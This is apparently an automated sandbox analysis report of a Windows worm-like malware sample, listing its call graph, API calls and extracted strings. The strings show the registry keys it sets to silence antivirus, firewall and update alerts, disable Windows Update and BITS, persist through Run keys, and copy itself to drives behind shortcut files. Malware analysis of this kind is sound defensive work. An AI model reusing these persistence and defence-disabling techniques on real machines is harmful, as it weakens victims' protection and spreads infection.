5180->5043 5180->5044 5182 40ebc4 InternetCloseHandle 5181->5182 5183 40ea7d HttpOpenRequestA 5181->5183 5182->5180 5184 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5183->5184 5185 40ebb7 InternetCloseHandle 5183->5185 5186 40ebaa InternetCloseHandle 5184->5186 5189 40eafd 5184->5189 5185->5182 5186->5185 5187 40eb14 InternetReadFile 5188 40eb41 5187->5188 5187->5189 5188->5186 5189->5187 5189->5188 5190 40a490 9 API calls 5189->5190 5191 40eb5c memcpy 5190->5191 5191->5189 5198 406ff7 5192->5198 5193 407250 CoCreateInstance 5193->5198 5194 4071cb 5196 4071d4 
SysFreeString 5194->5196 5197 406f9b SysFreeString 5194->5197 5195 40a660 _invalid_parameter 3 API calls 5195->5194 5196->5197 5197->4493 5198->5193 5199 407146 SysAllocString 5198->5199 5200 407012 5198->5200 5199->5198 5199->5200 5200->5194 5200->5195 5202 40c37a 5201->5202 5203 40c37e 5201->5203 5202->4499 5205 40c330 CryptAcquireContextW 5203->5205 5206 40c36b 5205->5206 5207 40c34d CryptGenRandom CryptReleaseContext 5205->5207 5206->5202 5207->5206 5208->4512 5260 40b280 gethostname 5209->5260 5212 40b369 5212->4512 5214 40b37c strcmp 5214->5212 5215 40b391 5214->5215 5264 40aed0 inet_ntoa 5215->5264 5217 40b39f strstr 5218 40b3f0 5217->5218 5219 40b3af 5217->5219 5267 40aed0 inet_ntoa 5218->5267 5265 40aed0 inet_ntoa 5219->5265 5222 40b3bd strstr 5222->5212 5224 40b3cd 5222->5224 5223 40b3fe strstr 5225 40b40e 5223->5225 5226 40b44f 5223->5226 5266 40aed0 inet_ntoa 5224->5266 5268 40aed0 inet_ntoa 5225->5268 5270 40aed0 inet_ntoa 5226->5270 5230 40b45d strstr 5233 40b46d 5230->5233 5234 40b4ae EnterCriticalSection 5230->5234 5231 40b3db strstr 5231->5212 5231->5218 5232 40b41c strstr 5232->5212 5235 40b42c 5232->5235 5271 40aed0 inet_ntoa 5233->5271 5237 40b4c6 5234->5237 5269 40aed0 inet_ntoa 5235->5269 5245 40b4f1 5237->5245 5273 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5237->5273 5239 40b43a strstr 5239->5212 5239->5226 5240 40b47b strstr 5240->5212 5241 40b48b 5240->5241 5272 40aed0 inet_ntoa 5241->5272 5244 40b5ea LeaveCriticalSection 5244->5212 5245->5244 5247 40a240 7 API calls 5245->5247 5246 40b499 strstr 5246->5212 5246->5234 5248 40b535 5247->5248 5248->5244 5274 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5248->5274 5250 40b553 5251 40b580 5250->5251 5252 40b576 Sleep 5250->5252 5254 40b5a5 5250->5254 5253 40a660 _invalid_parameter 3 API calls 5251->5253 5252->5250 5253->5254 5254->5244 5275 40b030 5254->5275 5256->4527 5258 40b030 14 API calls 5257->5258 5259 40b023 LeaveCriticalSection 5258->5259 5259->4519 5261 40b2a7 
gethostbyname 5260->5261 5262 40b2c3 5260->5262 5261->5262 5262->5212 5263 40aed0 inet_ntoa 5262->5263 5263->5214 5264->5217 5265->5222 5266->5231 5267->5223 5268->5232 5269->5239 5270->5230 5271->5240 5272->5246 5273->5245 5274->5250 5276 40b044 5275->5276 5277 40b03f 5275->5277 5278 40a450 _invalid_parameter 7 API calls 5276->5278 5277->5244 5280 40b058 5278->5280 5279 40b0b4 CreateFileW 5281 40b103 InterlockedExchange 5279->5281 5282 40b0d7 WriteFile FlushFileBuffers CloseHandle 5279->5282 5280->5277 5280->5279 5283 40a660 _invalid_parameter 3 API calls 5281->5283 5282->5281 5283->5277 5285 40d70d 5284->5285 5286 40d643 5285->5286 5287 40d731 WaitForSingleObject 5285->5287 5286->4534 5286->4535 5287->5285 5288 40d74c CloseHandle 5287->5288 5288->5285 5290 405829 memset GetModuleHandleW 5289->5290 5291 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5290->5291 5291->5291 5292 4058a0 CreateWindowExW 5291->5292 5293 4058cb 5292->5293 5294 4058cd GetMessageA 5292->5294 5295 4058ff ExitThread 5293->5295 5296 4058e1 TranslateMessage DispatchMessageA 5294->5296 5297 4058f7 5294->5297 5296->5294 5297->5290 5297->5295 5319 40ec20 CreateFileW 5298->5319 5300 406cd8 ExitThread 5302 406b80 5302->5300 5303 406cc8 Sleep 5302->5303 5304 406bb9 5302->5304 5322 406340 GetLogicalDrives 5302->5322 5303->5302 5328 406260 5304->5328 5307 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5308 406c66 wsprintfW 5307->5308 5309 406c7b wsprintfW 5307->5309 5308->5309 5334 406650 _chkstk 5309->5334 5310 406beb 5315 407407 5312->5315 5313 4074e1 Sleep 5313->5315 5314 40742f Sleep 5314->5315 5315->5313 5315->5314 5316 40745e Sleep wsprintfA DeleteUrlCacheEntry 5315->5316 5318 40ef90 64 API calls 5315->5318 5387 40eee0 InternetOpenA 5316->5387 5318->5315 5320 40ec68 5319->5320 5321 40ec4f GetFileSize CloseHandle 5319->5321 5320->5302 5321->5320 5327 40636d 5322->5327 5323 4063e6 5323->5302 5324 40637c RegOpenKeyExW 5325 40639e RegQueryValueExW 5324->5325 
5324->5327 5326 4063da RegCloseKey 5325->5326 5325->5327 5326->5327 5327->5323 5327->5324 5327->5326 5329 4062b9 5328->5329 5330 40627c 5328->5330 5329->5307 5329->5310 5369 4062c0 GetDriveTypeW 5330->5369 5333 4062ab lstrcpyW 5333->5329 5335 406667 5334->5335 5336 40666e 6 API calls 5334->5336 5335->5310 5337 406722 5336->5337 5338 406764 PathFileExistsW 5336->5338 5341 40ec20 3 API calls 5337->5341 5339 406803 PathFileExistsW 5338->5339 5340 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5338->5340 5344 406814 5339->5344 5345 406859 FindFirstFileW 5339->5345 5342 4067a9 CreateDirectoryW 5340->5342 5343 4067cb PathFileExistsW 5340->5343 5346 40672e 5341->5346 5342->5343 5348 4067bc SetFileAttributesW 5342->5348 5343->5339 5349 4067dc CopyFileW 5343->5349 5350 406834 5344->5350 5351 40681c 5344->5351 5345->5335 5362 406880 5345->5362 5346->5338 5347 406745 SetFileAttributesW DeleteFileW 5346->5347 5347->5338 5348->5343 5349->5339 5353 4067f4 SetFileAttributesW 5349->5353 5355 406400 3 API calls 5350->5355 5374 406400 CoInitialize CoCreateInstance 5351->5374 5352 406942 lstrcmpW 5356 406958 lstrcmpW 5352->5356 5352->5362 5353->5339 5357 40682f SetFileAttributesW 5355->5357 5356->5362 5357->5345 5359 406b19 FindNextFileW 5359->5352 5360 406b35 FindClose 5359->5360 5360->5335 5361 40699e lstrcmpiW 5361->5362 5362->5352 5362->5359 5362->5361 5363 406a05 PathMatchSpecW 5362->5363 5365 406a83 PathFileExistsW 5362->5365 5378 406510 CreateDirectoryW wsprintfW FindFirstFileW 5362->5378 5363->5362 5364 406a26 wsprintfW SetFileAttributesW DeleteFileW 5363->5364 5364->5362 5365->5362 5366 406a99 wsprintfW wsprintfW 5365->5366 5366->5362 5367 406b03 MoveFileExW 5366->5367 5367->5359 5370 40629f 5369->5370 5371 4062e8 5369->5371 5370->5329 5370->5333 5371->5370 5372 4062fc QueryDosDeviceW 5371->5372 5372->5370 5373 406316 StrCmpNW 5372->5373 5373->5370 5375 406436 5374->5375 5377 406472 5374->5377 5376 406440 wsprintfW 5375->5376 5375->5377 5376->5377 5377->5357 5379 
406565 lstrcmpW 5378->5379 5380 40663f 5378->5380 5381 406591 5379->5381 5382 40657b lstrcmpW 5379->5382 5380->5362 5384 40660c FindNextFileW 5381->5384 5382->5381 5383 406593 wsprintfW wsprintfW 5382->5383 5383->5381 5385 4065f6 MoveFileExW 5383->5385 5384->5379 5386 406628 FindClose RemoveDirectoryW 5384->5386 5385->5384 5386->5380 5388 40ef06 InternetOpenUrlA 5387->5388 5389 40ef78 Sleep 5387->5389 5390 40ef25 HttpQueryInfoA 5388->5390 5391 40ef6e InternetCloseHandle 5388->5391 5389->5315 5392 40ef64 InternetCloseHandle 5390->5392 5393 40ef4e 5390->5393 5391->5389 5392->5391 5393->5392 5394 40cf40 5399 40b1f0 5394->5399 5398 40cf6a 5400 40b280 2 API calls 5399->5400 5401 40b1ff 5400->5401 5402 40b209 5401->5402 5403 40b20d EnterCriticalSection 5401->5403 5402->5398 5406 40cf80 InterlockedExchangeAdd 5402->5406 5404 40b22c LeaveCriticalSection 5403->5404 5404->5402 5407 40cf96 5406->5407 5408 40cf9d 5406->5408 5407->5398 5423 40d270 5408->5423 5411 40cfbd InterlockedIncrement 5420 40cfc7 5411->5420 5413 40cff0 5433 40aed0 inet_ntoa 5413->5433 5415 40cffc 5417 40d0c0 InterlockedDecrement 5415->5417 5416 40d1a0 6 API calls 5416->5420 5448 40aff0 shutdown closesocket 5417->5448 5419 40a450 _invalid_parameter 7 API calls 5419->5420 5420->5413 5420->5416 5420->5417 5420->5419 5421 40a660 _invalid_parameter 3 API calls 5420->5421 5430 40b9d0 5420->5430 5434 40ba20 5420->5434 5421->5420 5424 40d27d socket 5423->5424 5425 40d292 htons connect 5424->5425 5426 40d2ef 5424->5426 5425->5426 5427 40d2da 5425->5427 5426->5424 5428 40cfad 5426->5428 5449 40aff0 shutdown closesocket 5427->5449 5428->5407 5428->5411 5450 40b930 5430->5450 5433->5415 5444 40ba31 5434->5444 5436 40ba4f 5438 40a660 _invalid_parameter 3 API calls 5436->5438 5439 40bdff 5438->5439 5439->5420 5440 40be10 21 API calls 5440->5444 5443 40b9d0 13 API calls 5443->5444 5444->5436 5444->5440 5444->5443 5445 40b330 32 API calls 5444->5445 5458 40bf60 5444->5458 5465 40b700 EnterCriticalSection 5444->5465 5470 
406e20 5444->5470 5475 406ec0 5444->5475 5480 406cf0 5444->5480 5487 406df0 5444->5487 5445->5444 5448->5407 5449->5428 5451 40c3b0 3 API calls 5450->5451 5452 40b93b 5451->5452 5453 40b957 lstrlenA 5452->5453 5454 40c640 7 API calls 5453->5454 5455 40b98d 5454->5455 5456 40b9b8 5455->5456 5457 40a660 _invalid_parameter 3 API calls 5455->5457 5456->5420 5457->5456 5459 40bf71 lstrlenA 5458->5459 5460 40c640 7 API calls 5459->5460 5463 40bf8f 5460->5463 5461 40bf9b 5462 40c01f 5461->5462 5464 40a660 _invalid_parameter 3 API calls 5461->5464 5462->5444 5463->5459 5463->5461 5464->5462 5466 40b718 5465->5466 5467 40b754 LeaveCriticalSection 5466->5467 5490 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5466->5490 5467->5444 5469 40b743 5469->5467 5491 406e60 5470->5491 5473 40d610 17 API calls 5474 406e59 5473->5474 5474->5444 5476 406e60 75 API calls 5475->5476 5477 406edf 5476->5477 5478 406f0c 5477->5478 5506 406f20 5477->5506 5478->5444 5509 405f40 EnterCriticalSection 5480->5509 5482 406d0a 5483 406d3d 5482->5483 5514 406d50 5482->5514 5483->5444 5486 40a660 _invalid_parameter 3 API calls 5486->5483 5521 406000 EnterCriticalSection 5487->5521 5489 406e12 5489->5444 5490->5469 5494 406e73 5491->5494 5492 406e34 5492->5473 5492->5474 5494->5492 5495 405e50 EnterCriticalSection 5494->5495 5496 40ccd0 71 API calls 5495->5496 5497 405e6e 5496->5497 5498 405f2b LeaveCriticalSection 5497->5498 5499 405e87 5497->5499 5502 405ea8 5497->5502 5498->5494 5500 405e91 memcpy 5499->5500 5501 405ea6 5499->5501 5500->5501 5503 40a660 _invalid_parameter 3 API calls 5501->5503 5502->5501 5505 405f06 memcpy 5502->5505 5504 405f28 5503->5504 5504->5498 5505->5501 5507 40b930 13 API calls 5506->5507 5508 406f65 5507->5508 5508->5478 5510 405f5e 5509->5510 5511 405fea LeaveCriticalSection 5510->5511 5512 40a6d0 8 API calls 5510->5512 5511->5482 5513 405fbc 5512->5513 5513->5511 5515 40a450 _invalid_parameter 7 API calls 5514->5515 5516 406d62 memcpy 5515->5516 5517 40b930 13 API 
calls 5516->5517 5518 406dcc 5517->5518 5519 40a660 _invalid_parameter 3 API calls 5518->5519 5520 406d31 5519->5520 5520->5486 5546 40cd30 5521->5546 5524 406243 LeaveCriticalSection 5524->5489 5525 40ccd0 71 API calls 5526 406039 5525->5526 5526->5524 5527 406158 5526->5527 5529 406094 memcpy 5526->5529 5528 406181 5527->5528 5530 405c90 75 API calls 5527->5530 5531 40a660 _invalid_parameter 3 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5530->5528 5533 4061a2 5531->5533 5534 4060b8 5532->5534 5533->5524 5535 4061b1 CreateFileW 5533->5535 5536 40a6d0 8 API calls 5534->5536 5535->5524 5537 4061d4 5535->5537 5538 4060c8 5536->5538 5541 4061f1 WriteFile 5537->5541 5542 40622f FlushFileBuffers CloseHandle 5537->5542 5539 40a660 _invalid_parameter 3 API calls 5538->5539 5540 4060ef 5539->5540 5543 40c640 7 API calls 5540->5543 5541->5537 5542->5524 5544 406125 5543->5544 5545 4072a0 71 API calls 5544->5545 5545->5527 5549 40c280 5546->5549 5551 40c291 5549->5551 5550 40a6d0 8 API calls 5550->5551 5551->5550 5552 40c1e0 70 API calls 5551->5552 5555 407fa0 68 API calls 5551->5555 5556 40c2ab 5551->5556 5557 40c2eb memcmp 5551->5557 5552->5551 5553 40a660 _invalid_parameter 3 API calls 5554 406022 5553->5554 5554->5524 5554->5525 5555->5551 5556->5553 5557->5551 5557->5556 5719 40d400 5720 40d416 5719->5720 5737 40d46e 5719->5737 5721 40d420 5720->5721 5722 40d473 5720->5722 5723 40d4c3 5720->5723 5720->5737 5724 40a240 7 API calls 5721->5724 5726 40d498 5722->5726 5727 40d48b InterlockedDecrement 5722->5727 5746 40c070 5723->5746 5728 40d42d 5724->5728 5729 40a660 _invalid_parameter 3 API calls 5726->5729 5727->5726 5742 4023d0 5728->5742 5731 40d4a4 5729->5731 5732 40a660 _invalid_parameter 3 API calls 5731->5732 5732->5737 5734 40b1f0 4 API calls 5735 40d44f 5734->5735 5736 40d45b InterlockedIncrement 5735->5736 5735->5737 5736->5737 5739 40d521 IsBadReadPtr 5740 40d4e9 5739->5740 5740->5737 5740->5739 5741 40ba20 194 API calls 5740->5741 
5751 40c170 5740->5751 5741->5740 5743 402413 5742->5743 5744 4023d9 5742->5744 5743->5734 5744->5743 5745 4023ea InterlockedIncrement 5744->5745 5745->5743 5747 40c083 5746->5747 5748 40c0ad memcpy 5746->5748 5749 40a490 9 API calls 5747->5749 5748->5740 5750 40c0a4 5749->5750 5750->5748 5752 40c199 5751->5752 5753 40c18e 5751->5753 5752->5753 5754 40c1b1 memmove 5752->5754 5753->5740 5754->5753 5755 40da00 5765 4013b0 5755->5765 5757 40b6b0 5 API calls 5760 40da0d 5757->5760 5758 40da27 InterlockedExchangeAdd 5759 40da6b WaitForSingleObject 5758->5759 5758->5760 5759->5760 5761 40da84 5759->5761 5760->5757 5760->5758 5760->5759 5762 40b9d0 13 API calls 5760->5762 5764 40da8d 5760->5764 5777 401330 5761->5777 5762->5760 5766 40a240 7 API calls 5765->5766 5767 4013bb CreateEventA socket 5766->5767 5768 4013f2 5767->5768 5769 4013f8 5767->5769 5770 401330 8 API calls 5768->5770 5771 401401 bind 5769->5771 5772 401462 5769->5772 5770->5769 5773 401444 CreateThread 5771->5773 5774 401434 5771->5774 5772->5760 5773->5772 5787 401100 5773->5787 5775 401330 8 API calls 5774->5775 5776 40143a 5775->5776 5776->5760 5778 401339 5777->5778 5784 40139b 5777->5784 5779 401341 SetEvent WaitForSingleObject CloseHandle 5778->5779 5778->5784 5785 401369 5779->5785 5786 40138b 5779->5786 5781 401395 5783 40a660 _invalid_parameter 3 API calls 5781->5783 5782 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5782->5785 5783->5784 5784->5764 5785->5782 5785->5786 5816 40aff0 shutdown closesocket 5786->5816 5788 401115 ioctlsocket 5787->5788 5789 4011e4 5788->5789 5794 40113a 5788->5794 5790 40a660 _invalid_parameter 3 API calls 5789->5790 5792 4011ea 5790->5792 5791 4011cd WaitForSingleObject 5791->5788 5791->5789 5793 40a490 9 API calls 5793->5794 5794->5791 5794->5793 5795 401168 recvfrom 5794->5795 5796 4011ad InterlockedExchangeAdd 5794->5796 5795->5791 5795->5794 5798 401000 5796->5798 5799 401014 5798->5799 5800 40103b 5799->5800 5801 40a240 7 API calls 
5799->5801 5809 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5800->5809 5801->5800 5803 40105b 5810 401580 5803->5810 5805 4010ec 5805->5794 5806 4010a3 IsBadReadPtr 5807 401071 5806->5807 5807->5805 5807->5806 5808 4010d8 memmove 5807->5808 5808->5807 5809->5803 5811 401592 5810->5811 5812 4015a5 memcpy 5810->5812 5814 40a490 9 API calls 5811->5814 5813 4015c1 5812->5813 5813->5807 5815 40159f 5814->5815 5815->5812 5816->5781 5817 40d980 5818 40ba20 194 API calls 5817->5818 5819 40d9b8 5818->5819 5820 40d580 5825 401b60 5820->5825 5822 40d595 5823 40d5b4 5822->5823 5824 401b60 16 API calls 5822->5824 5824->5823 5826 401b70 5825->5826 5844 401c42 5825->5844 5827 40a240 7 API calls 5826->5827 5826->5844 5828 401b9d 5827->5828 5829 40a6d0 8 API calls 5828->5829 5828->5844 5830 401bc9 5829->5830 5831 401be6 5830->5831 5832 401bd6 5830->5832 5834 401ae0 4 API calls 5831->5834 5833 40a660 _invalid_parameter 3 API calls 5832->5833 5835 401bdc 5833->5835 5836 401bf3 5834->5836 5835->5822 5837 401c33 5836->5837 5838 401bfc EnterCriticalSection 5836->5838 5841 40a660 _invalid_parameter 3 API calls 5837->5841 5839 401c13 5838->5839 5840 401c1f LeaveCriticalSection 5838->5840 5839->5840 5840->5822 5842 401c3c 5841->5842 5843 40a660 _invalid_parameter 3 API calls 5842->5843 5843->5844 5844->5822 5558 4069c8 5566 40696e 5558->5566 5559 40699e lstrcmpiW 5559->5566 5560 406b19 FindNextFileW 5562 406942 lstrcmpW 5560->5562 5563 406b35 FindClose 5560->5563 5561 406a05 PathMatchSpecW 5564 406a26 wsprintfW SetFileAttributesW DeleteFileW 5561->5564 5561->5566 5565 406958 lstrcmpW 5562->5565 5562->5566 5568 406b42 5563->5568 5564->5566 5565->5566 5566->5559 5566->5560 5566->5561 5567 406a83 PathFileExistsW 5566->5567 5571 406510 11 API calls 5566->5571 5567->5566 5569 406a99 wsprintfW wsprintfW 5567->5569 5569->5566 5570 406b03 MoveFileExW 5569->5570 5570->5560 5571->5566 5572 40f34c 5573 40f354 5572->5573 5575 40f408 5573->5575 5578 40f589 5573->5578 5577 40f38d 5577->5575 5582 
40f474 RtlUnwind 5577->5582 5580 40f59e 5578->5580 5581 40f5ba 5578->5581 5579 40f629 NtQueryVirtualMemory 5579->5581 5580->5579 5580->5581 5581->5577 5583 40f48c 5582->5583 5583->5577 5584 40b8d0 5585 40b8d3 WaitForSingleObject 5584->5585 5586 40b901 5585->5586 5587 40b8eb InterlockedDecrement 5585->5587 5588 40b8fa 5587->5588 5588->5585 5589 40b010 16 API calls 5588->5589 5589->5588 5590 401f50 GetQueuedCompletionStatus 5591 401f92 5590->5591 5592 402008 5590->5592 5593 401f97 WSAGetOverlappedResult 5591->5593 5597 401d60 5591->5597 5593->5591 5594 401fb9 WSAGetLastError 5593->5594 5594->5591 5596 401fd3 GetQueuedCompletionStatus 5596->5591 5596->5592 5598 401ef2 InterlockedDecrement setsockopt closesocket 5597->5598 5599 401d74 5597->5599 5601 401e39 5598->5601 5599->5598 5600 401d7c 5599->5600 5617 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5600->5617 5601->5596 5603 401d81 InterlockedExchange 5604 401d98 5603->5604 5605 401e4e 5603->5605 5604->5601 5610 401da9 InterlockedDecrement 5604->5610 5611 401dbc InterlockedDecrement InterlockedExchangeAdd 5604->5611 5606 401e67 5605->5606 5607 401e57 InterlockedDecrement 5605->5607 5608 401e72 5606->5608 5609 401e87 InterlockedDecrement 5606->5609 5607->5596 5626 401ae0 WSASend 5608->5626 5613 401ee9 5609->5613 5610->5596 5614 401e2f 5611->5614 5613->5596 5618 401cf0 5614->5618 5615 401e7e 5615->5596 5617->5603 5619 401d00 InterlockedExchangeAdd 5618->5619 5620 401cfc 5618->5620 5621 401d53 5619->5621 5622 401d17 InterlockedIncrement 5619->5622 5620->5601 5621->5601 5632 401c50 WSARecv 5622->5632 5624 401d46 5624->5621 5625 401d4c InterlockedDecrement 5624->5625 5625->5621 5627 401b50 5626->5627 5628 401b12 WSAGetLastError 5626->5628 5627->5615 5628->5627 5629 401b1f 5628->5629 5630 401b56 5629->5630 5631 401b26 Sleep WSASend 5629->5631 5630->5615 5631->5627 5631->5628 5633 401cd2 5632->5633 5634 401c8e 5632->5634 5633->5624 5635 401c90 WSAGetLastError 5634->5635 5636 401ca4 Sleep WSARecv 5634->5636 5637 401cdb 

                                                                                Control-flow Graph (function 00407500; graph rendering omitted)
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041AA40,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(0041AA40), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNEL32(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-2348032744
                                                                                • Opcode ID: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph (function 00406650; graph rendering omitted)
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59

                                                                                Control-flow Graph (function 00406510; graph rendering omitted)
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
